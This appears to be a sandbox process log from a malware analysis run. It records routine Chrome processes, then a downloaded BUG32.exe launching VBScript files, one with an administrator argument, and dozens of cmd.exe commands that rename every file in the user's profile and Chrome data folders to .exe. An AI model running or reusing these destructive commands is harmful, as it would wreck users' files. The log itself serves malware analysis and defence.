"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4932 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6052 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5708 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5712 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3292 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5208 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=4976 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=4452 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6088 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=5724 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=5364 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1668 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=4596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5988 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=2372 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5876 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=1624 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=5388 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=5580 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5052 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=3348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=5412 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4024 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Users\Admin\Downloads\BUG32.exe

"C:\Users\Admin\Downloads\BUG32.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1DCC.tmp\1DCD.vbs

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\3D Objects\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\OneDrive\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PeerDistRepub\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolder\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Publishers\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\*.*" "*.exe"

